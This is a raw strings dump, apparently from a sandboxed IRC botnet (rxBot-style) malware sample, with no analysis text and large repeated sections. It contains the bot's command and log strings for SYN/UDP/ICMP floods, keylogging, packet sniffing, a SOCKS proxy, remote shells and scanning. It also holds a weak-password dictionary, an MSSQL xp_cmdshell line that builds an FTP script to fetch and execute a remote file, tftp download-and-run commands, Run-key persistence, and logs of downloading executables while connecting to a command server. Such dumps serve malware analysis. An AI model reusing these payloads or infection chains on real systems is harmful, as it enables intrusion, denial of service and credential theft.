NOTICE %s :Your attempt has been logged.

NOTICE %s :Pass auth failed (%s!%s).

[MAIN]: Random nick change: %s

[FTP]: Uploading file: %s to: %s failed.

[FTP]: Uploading file: %s to: %s

ftp.exe

-s:%s

open %s

put %s

%s\%i%i%i.dll

[FTP]: File not found: %s.

[MAIN]: Invalid login slot number: %d.

[MAIN]: No user logged in at slot: %d.

[MAIN]: %s

QUIT :%s

[MAIN]: Status: Ready. Bot Uptime: %s.

[MAIN]: Bot ID: %s.

[THREADS]: Failed to start list thread, error: <%d>.

[MAIN]: Uptime: %s.

[CMD]: Remote shell ready.

[CMD]: Couldn't open remote shell.

[CMD]: Remote shell already running.

[TFTP]: Failed to start server thread, error: <%d>.

[TFTP]: Server started on Port: %d, File: %s, Request: %s.

[TFTP]: Already running.

[MAIN]: Nick changed to: '%s'.

[MAIN]: Joined channel: '%s'.

[MAIN]: Parted channel: '%s'.

[MAIN]: IRC Raw: %s.

[THREADS]: Failed to kill thread: %s.

[THREADS]: Killed thread: %s.

[THREADS]: Stopped: %d thread(s).

[MAIN]: Prefix changed to: '%c'.

[SHELL]: Couldn't open file: %s

[SHELL]: File opened: %s

[MAIN]: Server changed to: '%s'.

[DNS]: Lookup: %s -> %s.

[FILE]: Deleted '%s'.

[VISIT]: Failed to start connection thread, error: <%d>.

[VISIT]: URL: %s.

[CMD]: Commands: %s

[CMD]: Error sending to remote shell.

[MAIN]: Read file failed: %s

[MAIN]: Read file complete: %s

[MAIN]: Gethost: %s.

[MAIN]: Gethost: %s, Command: %s

[MAIN]: Alias added: %s.

[MAIN]: Privmsg: %s: %s.

[MAIN]: Action: %s: %s.

PART %s

[MAIN]: Mode change: %s

MODE %s

[CLONE]: Raw (%s): %s

[CLONE]: Mode (%s): %s

[CLONE]: Nick (%s): %s

JOIN %s %s

[MAIN]: Repeat not allowed in command line: %s

[MAIN]: Repeat: %s

%s %s %s :%s

[UPDATE]: Failed to start download thread, error: <%d>.

[UPDATE]: Downloading update from: %s.

%s%s.exe

[EXEC]: Commands: %s

[EXEC]: Couldn't execute file.

[CLONES]: Failed to start clone thread, error: <%d>.

[CLONES]: Created on %s:%d, in channel %s.

[DDoS]: Failed to start flood thread, error: <%d>.

[DDoS]: Flooding: (%s:%s) for %s seconds.

[DOWNLOAD]: Failed to start transfer thread, error: <%d>.

[DOWNLOAD]: Downloading URL: %s to: %s.

[REDIRECT]: Failed to start redirection thread, error: <%d>.

[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.

[SCAN]: Failed to start scan thread, error: <%d>.

[SCAN]: Port scan started: %s:%d with delay: %d(ms).

[%s] <%s> %s

[%s] * %s %s

ACTION %s

[UDP]: Failed to start flood thread, error: <%d>.

[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).

ICMP.dll not available

[PING]: Failed to start flood thread, error: <%d>.

[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).

[EMAIL]: Message sent to %s.

helo $rndnick

mail from: <%s>

rcpt to: <%s>

subject: %s

from: %s

udpflood

c_privmsg

. Failed to start flood thread, error: <%d>.

. Flooding: (%s:%s) for %s seconds.

ddos.supersyn

c_join

c_nick

privmsg

[IDENT]: Server stopped. (%d thread(s) stopped.)

mirccmd

c_rndnick

join

nick

tftp

tftpserver

[MAIN]: Login list complete.

%d. %s

-[Login List]-

[CMD]

cmdstop

ocmd

opencmd

[TFTP]

tftpstop

supersyn.stop

TCP redirect

rndnick

$rndnick

NOTICE %s :

PING %s

VERSION %s

[MAIN]: Joined channel: %s.

[MAIN]: User: %s logged out.

:%s%s

NICK

NOTICE %s :%s

[MAIN]: User %s logged out.

PONG %s

%s Error: %s <%d>.

explorer.exe

%%comspec%% /c %s %s

del "%s"

%sdel.bat

%d.%d.%d.%d

[PING]: Finished sending pings to %s.

[PING]: Error sending pings to %s.

[UDP]: Finished sending packets to %s.

[UDP]: Error sending pings to %s.

[REDIRECT]: Failed to start client thread, error: <%d>.

[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.

[REDIRECT]: Failed to start connection thread, error: <%d>.

[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.

PRIVMSG %s :%s

[CMD]: Could not read data from proccess.

[CMD]: Proccess has terminated.

[CMD]: Could not read data from proccess

[CMD]: Failed to start IO thread, error: <%d>.

[CMD]: Remote Command Prompt

cmd.exe

[%s]|

[%d]%s

[SCAN]: IP: %s Port: %d is open.

[SCAN]: Scanning IP: %s, Port: %d.

tftp.exe -i get

IP: %s

[TFTP]: Failed to open file: %s.

[TFTP]: Error: socket() failed, returned: <%d>.

%s: No %s thread found.

%s: %s stopped. (%d thread(s) stopped.)

[VISIT]: Failed to connect to HTTP server.

[VISIT]: Invalid URL.

[VISIT]: Failed to get requested URL from HTTP server.

[VISIT]: URL visited.

zcÁ

[07-30-2014 01:50:55] [DOWNLOAD]: Opened: C:/windows/systemj.exe.

s/systemj.exe @ 195.8 KB/sec.

exe?dl=1 to: C:/windows/system.e[07-30-2014 01:50:54] [DOWNLOAD]: Opened: C:/windows/system.exe.

[07-30-2014 01:50:54] [DOWNLOAD]: Downloaded 587.5 KB to C:/windows/systemj.exe @ 195.8 KB/sec.

[07-30-2014 01:50:53] [DOWNLOAD]: Downloaded 482.3 KB to C:/windows/system.exe @ 241.2 KB/sec.

[07-30-2014 01:50:46] [MAIN]: Joined channel: #fkyou#.

[07-30-2014 01:50:46] [DOWNLOAD]: Downloading URL: http://www.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1 to: C:/windows/system.

[07-30-2014 01:50:45] [MAIN]: Joined channel: #Security-Check.

[07-30-2014 01:50:45] [DOWNLOAD]: Downloading URL: http://www.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1 to: C:/windows/systemj

[07-30-2014 01:50:45] [MAIN]: Connected to videos.p0rn-lover.us.

[07-30-2014 01:50:44] [IDENTD]: Server running on Port: 113.

DOWNLOAD]: File download: http://www.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1 (587KB transferred).

emj.exe.

DOWNLOAD]: File download: http://www.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1 (482KB transferred).

em.exe.

%System%\pwyqire.exe

19584375

000000009

pwyqire.exe_500_rwx_00400000_0009C000:

.text

`.rdata

@.data

_WSSh

t1SSSSh

PeekNamedPipe

CreatePipe

KERNEL32.dll

WS2_32.dll

GetCPInfo

%d. %s = %s

[%.2d-%.2d-M %.2d:%.2d:%.2d] %s

[DDoS]: Send error: <%d>.

ddos.random

ddos.ack

ddos.syn

[DOWNLOAD]: Bad URL, or DNS Error: %s.

[UPDATE]: Update failed: Error executing file: %s.

[UPDATE]: Downloaded %.1fKB to %s @ %.1fKB/sec. Updating.

[DOWNLOAD]: Opened: %s.

[DOWNLOAD]: Downloaded %.1f KB to %s @ %.1f KB/sec.

[DOWNLOAD]: CRC Failed (%d != %d).

[DOWNLOAD]: Filesize is incorrect: (%d != %d).

[DOWNLOAD]: Update: %s (%dKB transferred).

[DOWNLOAD]: File download: %s (%dKB transferred).

[DOWNLOAD]: Couldn't open file: %s.

[IDENTD]: Error: server failed, returned: <%d>.

: USERID : UNIX : %s

[IDENTD]: Client connection from IP: %s:%d.

%s %s :%s

PRIVMSG

avicap32.dll

SQLDisconnect

SQLFreeHandle

SQLAllocHandle

SQLExecDirect

SQLSetEnvAttr

SQLDriverConnect

odbc32.dll

ShellExecuteA

shell32.dll

mpr.dll

iphlpapi.dll

dnsapi.dll

netapi32.dll

icmp.dll

Mozilla/4.0 (compatible)

InternetCrackUrlA

InternetOpenUrlA

HttpSendRequestA

HttpOpenRequestA

wininet.dll

ws2_32.dll

gdi32.dll

RegCloseKey

RegCreateKeyExA

RegOpenKeyExA

advapi32.dll

ExitWindowsEx

user32.dll

kernel32.dll

Avicap32.dll failed. <%d>

Odbc32.dll failed. <%d>

Shell32.dll failed. <%d>

Mpr32.dll failed. <%d>

Iphlpapi.dll failed. <%d>

Dnsapi.dll failed. <%d>

Netapi32.dll failed. <%d>

Icmp.dll failed. <%d>

Wininet.dll failed. <%d>

Ws2_32.dll failed. <%d>

Gdi32.dll failed. <%d>

Advapi32.dll failed. <%d>

User32.dll failed. <%d>

Kernel32.dll failed. <%d>

videos.p0rn-lover.us

support.exe

Supports RAS Connections

g.dat

Software\Microsoft\Windows\CurrentVersion\Run

Software\Microsoft\Windows\CurrentVersion\RunServices

winpass

sqlpassoainstall

databasepassword

databasepass

dbpassword

dbpass

domainpassword

domainpass

loginpass

login

windows

1234567890

123456789

12345678

1234567

pass1234

passwd

password

password1

*@fbi.edu

Ý %dh %dm

[NETINFO]: [Type]: %s (%s). [IP Address]: %s. [Hostname]: %s.

[IDENTD]: Failed to start server, error: <%d>.

[IDENTD]: Server running on Port: 113.

%s %d "%s"

%s\%s

[MAIN]: Connected to %s.

NICK %s

USER %s 0 0 :%s

PASS %s

MODE %s %s

USERHOST %s

[MAIN]: User: %s logged in.

[MAIN]: Password accepted.

[MAIN]: *Failed host auth by: (%s!%s).

NOTICE %s :Host Auth failed (%s!%s).

[MAIN]: *Failed pass auth by: (%s!%s).

NOTICE %s :Your attempt has been logged.

NOTICE %s :Pass auth failed (%s!%s).

[MAIN]: Random nick change: %s

[FTP]: Uploading file: %s to: %s failed.

[FTP]: Uploading file: %s to: %s

ftp.exe

-s:%s

open %s

put %s

%s\%i%i%i.dll

[FTP]: File not found: %s.

[MAIN]: Invalid login slot number: %d.

[MAIN]: No user logged in at slot: %d.

[MAIN]: %s

QUIT :%s

[MAIN]: Status: Ready. Bot Uptime: %s.

[MAIN]: Bot ID: %s.

[THREADS]: Failed to start list thread, error: <%d>.

[MAIN]: Uptime: %s.

[CMD]: Remote shell ready.

[CMD]: Couldn't open remote shell.

[CMD]: Remote shell already running.

[TFTP]: Failed to start server thread, error: <%d>.

[TFTP]: Server started on Port: %d, File: %s, Request: %s.

[TFTP]: Already running.

[MAIN]: Nick changed to: '%s'.

[MAIN]: Joined channel: '%s'.

[MAIN]: Parted channel: '%s'.

[MAIN]: IRC Raw: %s.

[THREADS]: Failed to kill thread: %s.

[THREADS]: Killed thread: %s.

[THREADS]: Stopped: %d thread(s).

[MAIN]: Prefix changed to: '%c'.

[SHELL]: Couldn't open file: %s

[SHELL]: File opened: %s

[MAIN]: Server changed to: '%s'.

[DNS]: Lookup: %s -> %s.

[FILE]: Deleted '%s'.

[VISIT]: Failed to start connection thread, error: <%d>.

[VISIT]: URL: %s.

[CMD]: Commands: %s

[CMD]: Error sending to remote shell.

[MAIN]: Read file failed: %s

[MAIN]: Read file complete: %s

[MAIN]: Gethost: %s.

[MAIN]: Gethost: %s, Command: %s

[MAIN]: Alias added: %s.

[MAIN]: Privmsg: %s: %s.

[MAIN]: Action: %s: %s.

PART %s

[MAIN]: Mode change: %s

MODE %s

[CLONE]: Raw (%s): %s

[CLONE]: Mode (%s): %s

[CLONE]: Nick (%s): %s

JOIN %s %s

[MAIN]: Repeat not allowed in command line: %s

[MAIN]: Repeat: %s

%s %s %s :%s

[UPDATE]: Failed to start download thread, error: <%d>.

[UPDATE]: Downloading update from: %s.

%s%s.exe

[EXEC]: Commands: %s

[EXEC]: Couldn't execute file.

[CLONES]: Failed to start clone thread, error: <%d>.

[CLONES]: Created on %s:%d, in channel %s.

[DDoS]: Failed to start flood thread, error: <%d>.

[DDoS]: Flooding: (%s:%s) for %s seconds.

[DOWNLOAD]: Failed to start transfer thread, error: <%d>.

[DOWNLOAD]: Downloading URL: %s to: %s.

[REDIRECT]: Failed to start redirection thread, error: <%d>.

[REDIRECT]: TCP redirect created from: %s:%d to: %s:%d.

[SCAN]: Failed to start scan thread, error: <%d>.

[SCAN]: Port scan started: %s:%d with delay: %d(ms).

[%s] <%s> %s

[%s] * %s %s

ACTION %s

[UDP]: Failed to start flood thread, error: <%d>.

[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).

ICMP.dll not available

[PING]: Failed to start flood thread, error: <%d>.

[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).

[EMAIL]: Message sent to %s.

helo $rndnick

mail from: <%s>

rcpt to: <%s>

subject: %s

from: %s

udpflood

c_privmsg

. Failed to start flood thread, error: <%d>.

. Flooding: (%s:%s) for %s seconds.

ddos.supersyn

c_join

c_nick

privmsg

[IDENT]: Server stopped. (%d thread(s) stopped.)

mirccmd

c_rndnick

join

nick

tftp

tftpserver

[MAIN]: Login list complete.

%d. %s

-[Login List]-

[CMD]

cmdstop

ocmd

opencmd

[TFTP]

tftpstop

supersyn.stop

TCP redirect

rndnick

$rndnick

NOTICE %s :

PING %s

VERSION %s

[MAIN]: Joined channel: %s.

[MAIN]: User: %s logged out.

:%s%s

NICK

NOTICE %s :%s

[MAIN]: User %s logged out.

PONG %s

%s Error: %s <%d>.

explorer.exe

%%comspec%% /c %s %s

del "%s"

%sdel.bat

%d.%d.%d.%d

[PING]: Finished sending pings to %s.

[PING]: Error sending pings to %s.

[UDP]: Finished sending packets to %s.

[UDP]: Error sending pings to %s.

[REDIRECT]: Failed to start client thread, error: <%d>.

[REDIRECT]: Client connection from IP: %s:%d, Server thread: %d.

[REDIRECT]: Failed to start connection thread, error: <%d>.

[REDIRECT]: Client connection to IP: %s:%d, Server thread: %d.

PRIVMSG %s :%s

[CMD]: Could not read data from proccess.

[CMD]: Proccess has terminated.

[CMD]: Could not read data from proccess

[CMD]: Failed to start IO thread, error: <%d>.

[CMD]: Remote Command Prompt

cmd.exe

[%s]|

[%d]%s

[SCAN]: IP: %s Port: %d is open.

[SCAN]: Scanning IP: %s, Port: %d.

tftp.exe -i get

IP: %s

[TFTP]: Failed to open file: %s.

[TFTP]: Error: socket() failed, returned: <%d>.

%s: No %s thread found.

%s: %s stopped. (%d thread(s) stopped.)

[VISIT]: Failed to connect to HTTP server.

[VISIT]: Invalid URL.

[VISIT]: Failed to get requested URL from HTTP server.

[VISIT]: URL visited.

zcÁ

[07-30-2014 01:50:55] [DOWNLOAD]: Opened: C:/windows/systemj.exe.

s/systemj.exe @ 195.8 KB/sec.

exe?dl=1 to: C:/windows/system.e[07-30-2014 01:50:54] [DOWNLOAD]: Opened: C:/windows/system.exe.

[07-30-2014 01:50:54] [DOWNLOAD]: Downloaded 587.5 KB to C:/windows/systemj.exe @ 195.8 KB/sec.

[07-30-2014 01:50:53] [DOWNLOAD]: Downloaded 482.3 KB to C:/windows/system.exe @ 241.2 KB/sec.

[07-30-2014 01:50:46] [MAIN]: Joined channel: #fkyou#.

[07-30-2014 01:50:46] [DOWNLOAD]: Downloading URL: http://www.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1 to: C:/windows/system.

[07-30-2014 01:50:45] [MAIN]: Joined channel: #Security-Check.

[07-30-2014 01:50:45] [DOWNLOAD]: Downloading URL: http://www.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1 to: C:/windows/systemj

[07-30-2014 01:50:45] [MAIN]: Connected to videos.p0rn-lover.us.

[07-30-2014 01:50:44] [IDENTD]: Server running on Port: 113.

DOWNLOAD]: File download: http://www.dropbox.com/s/yec4ibud71nzl4k/120.exe?dl=1 (587KB transferred).

emj.exe.

DOWNLOAD]: File download: http://www.dropbox.com/s/eniahgllsch8thw/rep.exe?dl=1 (482KB transferred).

em.exe.

%System%\pwyqire.exe

19584375

000000009

iexplorer.exe_1652:

.text

`.rdata

@.data

tTSSh,

YYu.jWX

uDPh

GWSSh

t1SSSSh

u.hpfB

(msql)

Trying: (%s:%d) user: (%s/%s).

IP: %s

EXEC master..xp_cmdshell '%s'

EXEC master..xp_cmdshell 'del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s&del eq

DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s

winpass

sqlpassoainstall

databasepassword

databasepass

dbpassword

dbpass

domainpassword

domainpass

loginpass

login

windows

1234567890

123456789

12345678

1234567

pass1234

passwd

password

password1

Windows XP (SP0 SP1)

Windows NT4, 2000 (SP0-SP4)

\\%s\pipe\browser

\\%s\ipc$

sqlpass

%s %s %s User: (%s) Pass: (%s)

(no password)

%s\%s\%s

c$\windows\system32

%s\ipc$

99999999

21122112

00000000

Password

newpass

passe

!@#$%^&*

~!@#$%^&

monkey

7654321

87654321

%systemroot%\system32\cmd.exe

VNC%d.%d %s: %s - [NoPassword]

VNC%d.%d %s: %s - %s

VNC%d.%d %s: %s - [AuthBypass]

RFB d.d

del eq&echo open %s %d >> eq&echo user %d %d >> eq &echo get %s >> eq &echo quit >> eq &ftp -n -s:eq &%s &del eq

port

nick

join

tftp

rndnick

httpstop

opencmd

cmdstop

rcmd

httpcon

keylog

*@im.batman

[%.2d-%.2d-M %.2d:%.2d:%.2d] %s

%s Error: %s <%d>.

explorer.exe

%s %s

%%comspec%% /c %s %s

del "%s"

%sdel.bat

%s %s :%s

PRIVMSG

PRIVMSG %s :%s

%s Failed to start IO thread, error %d

cmd.exe

%s: %s (%s)

The following Windows services are registered:

%s User info error: <%ld>

Units Per Week: %d

Max. Storage: %d

User's Language: %d

Country Code: %d

Workstations: %S

Logon Server: %S

Last Logoff: %d

Last Logon: %d

Number of Logins: %d

Bad Password Count: %d

Password Age: %d

Parameters: %S

Home Directory: %S

Auth Flags: %d

Privilege Level: %s

Comment: %S

User Comment: %S

Full Name: %S

Account: %S

The password is shorter than required (or does not meet the password policy requirement.)

The operation is allowed only on the primary domain controller of the domain.

This network request is not supported.

%s %s <Server: %S> <Message: %S></Message:></Server:>

%s Message sent successfully

%s Not supported by this system

%s Unable to allocation ARP cache

%s Error getting ARP cache %d

%s ARP cache is empty

%s Error getting ARP cache %d

%d.%d.%d.%d

%s %s HTTP/1.1

Referer: %s

Host: %s

%s %s Drive (%s): %s total, %s free, %s available.

%s %s Drive (%s): Failed to stat, device not ready.

%s (%d)

%s Process list failed

%s Process list completed

%s Listing processes:

%s Netapi32.dll couldn't be loaded

%s Network shares deleted

%s Failed to delete '%S' share.

%s Share '%S' deleted.

%s Failed to delete '%s' share.

%s Share '%s' deleted.

%s Advapi32.dll couldn't be loaded

%s Failed to open IPC$ Restriction registry key

%s Restricted access to the IPC$ Share

%s Failed to restrict access to the IPC$ Share

%s Failed to open DCOM registry key

%s DCOM disabled

%s Disable DCOM failed

%s Network shares added

%s Failed to add '%s' share.

%s Share '%s' added.

%s Failed to open IPC$ restriction registry key

%s Unrestricted access to the IPC$ Share

%s Failed to unrestrict access to the IPC$ Share

%s DCOM enabled

%s Enable DCOM failed

%s Transfer Complete On %s Executing ::(

%s Error: socket() failed, returned: %d

%s Failed to send to Remote command shell

%s Failed to open remote command shell

%s Failed to open socket

%s Transfer complete to IP: %s Filename: %s (%s bytes)

%s Unable to open socket

.DCC SEND %s %i %i %i.

%s File doesn't exist

%s Failed to bind to socket

%s Failed to create socket

%s Transfer complete from IP: %s Filename: %s (%s bytes)

%s Socket error

%s Error opening socket

%s Error opening file for writing

%s Error unable to write file to disk

%d. %s = %s

%s IP: %s Port: %d is open

IP: %s Port: %d

%s Bad URL, or DNS Error: %s

%s Update failed: Error executing file: %s

%s Downloaded %.1fKB to %s @ %.1fKB/sec. Updating

%s Opened: %s

%s Downloaded %.1f KB to %s @ %.1f KB/sec.

A%s CRC Failed (%d != %d)

%s Filesize is incorrect: (%d != %d).

%s Update: %s (%dKB transferred)

%s File download: %s (%dKB transferred)

%s Couldn't open file: %s

%s %s: No service specified

%s Error with service: '%s'. %s

%s %s service: '%s'.

%s %s: No share specified

%s %s share: '%s'.

%s %s: Error with share: '%s'. %s

%s Share list error: %s <%ld>

%s %s: No username specified

%s %s: Error with username: '%s'. %s

%s %s username: '%s'

Total users found: %d.

%s An access violation has occured

%s User list error: %s <%ld>

PRIVMSG %s :Found %s Files and %s Directories

"><CODE>%s</CODE>

PRIVMSG %s :%-31s %-21s (%s bytes)

"><CODE>%s/</CODE>

%s%s/

<TD WIDTH="%d"><A HREF="</pre><pre>PRIVMSG %s :%-31s %-21s</pre><pre>%2.2d/%2.2d/M %2.2d:%2.2d %s</pre><pre><TD COLSPAN=" 3="3"><CODE>Parent Directory</CODE></A></TD>

Searching for: %s

<TD WIDTH="%d"><CODE>Last Modified</CODE></TD>

<H1>Index of %s</H1>

<TITLE>Index of %s</TITLE>

PRIVMSG %s :Searching for: %s

%s List complete.

HTTP/1.0 200 OK

Content-Type: %s

Date: %s %s GMT

Last-Modified: %s %s GMT

Expires: %s %s GMT

%s Failed to start worker thread, error %d

%s Worker thread of server thread: %d

%s Error: server failed, returned %d

MODE %s %s

USERHOST %s

[SOCKS4]: Failed to start server thread, error: <%d>.

[SOCKS4]: Server started on: %s:%d.

%s Failed to start secure thread, error %d

%s %s System

[DDoS]: Failed to start flood thread, error: <%d>.

[DDoS]: Flooding: (%s:%s) for %s seconds.

[SYN]: Failed to start flood thread, error: <%d>.

[SYN]: Flooding: (%s:%s) for %s seconds.

[ICMP]: Failed to start flood thread, error: <%d>.

[ICMP]: Flooding: (%s) for %s seconds.

[UDP]: Failed to start flood thread, error: <%d>.

[UDP]: Sending %d packets to: %s. Packet size: %d, Delay: %d(ms).

ICMP.dll not available

[PING]: Failed to start flood thread, error: <%d>.

[PING]: Sending %d pings to %s. packet size: %d, timeout: %d(ms).

[TCP]: Invalid flood time must be greater than 0.

[TCP]: Failed to start flood thread, error: <%d>.

[TCP]: %s %s flooding: (%s:%s) for %s seconds.

[TCP]: Invalid flood type specified.

%s Uploading file: %s to: %s failed

%s Uploading file: %s to: %s

ftp.exe

-s:%s

open %s

put %s

%s\%i%i%i.dll

%s File not found: %s

tcpflood

udpflood

%s failed to start, no range specified

%s failed to start, syntax is invalid

%s already %d threads. too many specified

%s Failed to start, no range specified

%s Failed to start, syntax is invalid

%s Failed to start thread, error: %d

%s %s Method started at %s :%s for %d minutes %d delay %d threads

%s Already %d threads. Too many specified.

%s Failed to start, thread, error %d

%s Started: %s:%d with delay: %d(ms)

%s Downloading URL: %s to: %s

%s Rename: '%s' to: '%s'

%s Couldn't execute file

%s ID must be different than current running process

%s Failed to start download thread, error %d

%s Downloading update from: %s

%s%s.exe

ddos.random

ddos.ack

ddos.syn

%s Repeat not allowed in command line: %s

%s Repeat: %s

Mode change: %s

MODE %s

Action: %s: %.

ACTION %s

Privmsg: %s: %s

%s Alias added: %s

%s Gethost: %s

%s Unable to extract Gethost command

%s Gethost: %s , Command: %s

%s %s %s :%s

%s Command unknown

%s No message specified

%s User list failed

%s User list completed

%s Share list failed

%s Share list completed

%s Service list failed

%s Service list complete.

%s Failed to load advapi32.dll or netapi32.dll

[KEYLOG]: Failed to start logging thread, error: <%d>.

[KEYLOG]: Key logger active.

[KEYLOG]: Already running.

[KEYLOG]: No key logger thread found.

[KEYLOG]: Key logger stopped. (%d thread(s) stopped.)

[PSNIFF]: Carnivore stopped. (%d thread(s) stopped.)

[PSNIFF]: Failed to start sniffer thread, error: <%d>.

%s Read file failed: %s

%s Read file complete: %s

%s Commands: %s

%s Error sending to remote shell

%s Command sent

%s Client not open

List: %s

%s Send File: %s, User: %s

%s Deleted '%s'

%s Failed to terminate process ID: %s

%s Process killed ID: %s

%s Failed to terminate process: %s

%s Process killed: %s

%s Couldn't resolve hostname

%s Lookup: %s -> %s

%s Server changed to: '%s'

%s File opened: %s

%s Prefix changed to: '%c'

%s Failed to kill thread: %s

%s Killed thread: %s

%s No active threads found

%s Stopped: %d thread(s)

IRC Raw: %s

Parted channel: '%s'.

PART %s

Joined channel: '%s'.

Nick changed to: '%s'.

%s Currently %d Threads

%s Crashing bot

%s TfTp Server started on Port: %d, File: %s, Request: %s

%s Already running

%s Failed to start server thread, error %d

%s Server listening on IP: %s:%d, Directory: %s\.

%s Failed to load dnsapi.dll

%s Failed to flush DNS cache

%s DNS cache flushed

%s Failed to flush ARP cache

%s ARP cache flushed

Login list complete

%d. %s

%s Remote shell ready

%s Couldn't open remote shell

%s Remote shell already running

%s Uptime: %s

%s Failed to start listing thread, error %d

%s Proccess list

%s Failed to start listing thread, error %d

%s Failed to start list thread, error %d

%s Bot ID: %s

%s Status: Ready. Bot Uptime: %s

QUIT :%s

[TFTP]

tftpstop

UDP flood

udpstop

ddos.stop

%s Invalid login slot number: %d

%s No user logged in at slot: %d

%s User %s logged out.

%s Random nick change: %s

$rndnick

User: %s logged in

%s *Failed host auth by: (%s!%s)

NOTICE %s :Host Auth failed (%s!%s).

%s *Failed pass auth by: (%s!%s)

NOTICE %s :Your attempt has been logged.

NOTICE %s :Pass auth failed (%s!%s).

NOTICE %s : Password(arg) = '%s'

NOTICE %s : Password(enc) = '%s'

NOTICE %s : Password = '%s'

NOTICE %s : Password(before) = '%s'

NOTICE %s : Authost = '%s'

NOTICE %s : Nickconst = '%s'

NOTICE %s : Channel = '%s'

NOTICE %s : Server = '%s'

NOTICE %s : Version = '%s'

NOTICE %s : Id = '%s'

%s Chat failed by unauthorized user: %s

%s Chat already active with user: %s

%s Failed to start chat thread, error %d

%s Chat from user: %s

%s Receive file: '%s' failed from unauthorized user: %s.

NOTICE %s :

PING %s

VERSION %s

%s Failed to start transfer thread, error %d

%s Receive file: '%s' from user: %s.

%s User: %s logged out

Joined channel: %s

:%s%s

NICK

NOTICE %s :%s

%s User %s logged out

NICK %s

JOIN %s %s

PONG %s

USER %s 0 0 :%s

PASS %s

Connected to %s

%s Bot started

%s %d "%s"

%s\%s

Total: %d in %s

[%s]: %d,

tftp -i %s get %s &%s

%s Scan not active.

%s Current IP: %s

[FTP]: Failed to start server, error: <%d>.

[FTP]: Server started on Port: %d, File: %s, Request: %s.

%s Failed to start server, error: <%d>.

%s Server started on Port: %d, File: %s, Request: %s.

IP: %s, Port %d is open.

IP: %s:%d, Scan thread: %d, Sub-thread: %d.

%s Finished at %s:%d after %d minute(s) of scanning.

Failed to start worker thread, error: <%d>.

%s:%d, Scan thread: %d, Sub-thread: %d.

-[DDoS]: Send error: <%d>.

IP: %s (%s).

200 PORT command successful.

%s.%s.%s.%s

PORT

425 Passive not supported on this server

215 StnyFtpd

331 Password required

220 StnyFtpd 0wns j0

[ICMP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.

[ICMP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).

[ICMP]: Error: setsockopt() failed, returned: <%d>.

[ICMP]: Error: socket() failed, returned: <%d>.

[KEYLOG]: %s

[%d-%d-%d %d:%d:%d] %s

%s (Return) (%s)

%s (Buffer full) (%s)

%s (Changed Windows: %s)

SQLDisconnect

SQLFreeHandle

SQLAllocHandle

SQLExecDirect

SQLSetEnvAttr

SQLDriverConnect

odbc32.dll

ShellExecuteA

shell32.dll

mpr.dll

iphlpapi.dll

dnsapi.dll

netapi32.dll

icmp.dll

Mozilla/4.0 (compatible)

InternetCrackUrlA

InternetOpenUrlA

HttpSendRequestA

HttpOpenRequestA

wininet.dll

ws2_32.dll

gdi32.dll

RegCloseKey

RegCreateKeyExA

RegOpenKeyExA

advapi32.dll

GetKeyState

GetAsyncKeyState

ExitWindowsEx

user32.dll

kernel32.dll

Avicap32.dll failed. <%d>

Odbc32.dll failed. <%d>

Shell32.dll failed. <%d>

Mpr32.dll failed. <%d>

Iphlpapi.dll failed. <%d>

Dnsapi.dll failed. <%d>

Netapi32.dll failed. <%d>

Icmp.dll failed. <%d>

Wininet.dll failed. <%d>

Ws2_32.dll failed. <%d>

Gdi32.dll failed. <%d>

Advapi32.dll failed. <%d>

User32.dll failed. <%d>

Kernel32.dll failed. <%d>

%s.bck

sfc_os.dll

TCPIP.SYS fixed, version %d.

%s\drivers\tcpip.sys

Patching tcpip.sys.

[PING]: Finished sending pings to %s.

[PING]: Error sending pings to %s.

[UDP]: Finished sending packets to %s.

[UDP]: Error sending pings to %s.

https:/

http:/

[pStore] %s %s:%s

pstorec.dll

|%.2d|%s|

[%d]%s

[%s|%s|%s|%s]-

Ý %dh %dm

[PSNIFF]: Error: recv() failed, returned: <%d>

[PSNIFF]: Suspicious %s packet from: %s:%d - %s.

[PSNIFF]: Error: WSAIoctl() failed, returned: <%d>.

[PSNIFF]: Error: bind() failed, returned: <%d>.

[PSNIFF]: Error: socket() failed, returned: <%d>.

[SOCKS4]: Error: Failed to connect to target, returned: <%d>.

[SOCKS4]: Error: Failed to open socket(), returned: <%d>.

[SOCKS4]: Authentication failed. Remote userid: %s != %s.

[SOCKS4]: Failed to start server on Port %d.

[SOCKS4]: Failed to start client thread, error: <%d>.

[SOCKS4]: Client connection from IP: %s:%d, Server thread: %d.

[SYN]: Send error: <%d>.

%s [CpU]: %I64uMHz. [RaM] %sKB total, %sKB free. [DiSk] %s total, %s free. [Os] Windows %s (%d.%d, Build %d). [SyS DiR] %s. [HoStNaMe] %s (%s). [CuRrEnT uSeR] %s. [DaTe] %s. [TiMe] %s. [UpTiMe] %s

%s (%s)

%s [TyPe] %s (%s). [Ip AdDrEsS] %s. [HoStNaMe] %s.

[TCP]: Error sending packets to IP: %s. Packets sent: %d. Returned: <%d>.

[TCP]: Done with %s flood to IP: %s. Sent: %d packet(s) @ %dKB/sec (%dMB).

[TCP]: Invalid target IP.

[TCP]: Error: setsockopt() failed, returned: <%d>.

[TCP]: Error: socket() failed, returned: <%d>.

:POST / HTTP/1.0

Content-Length: %d

: Europe[ %d kbit/s] USA[ %d kbit/s] Asia[ %d kbit/s] Average[ %d kbit/s]

www.google.co.jp

yahoo.co.jp

www.nifty.com

www.d1asia.com

www.st.lib.keio.ac.jp

www.lib.nthu.edu.tw

www.google.com

www.easynews.com

www.above.net

www.level3.com

nitro.ucsc.edu

www.burst.net

www.cogentco.com

www.rit.edu

www.nocster.com

www.verio.com

www.stanford.edu

www.xo.net

www.google.it

de.yahoo.com

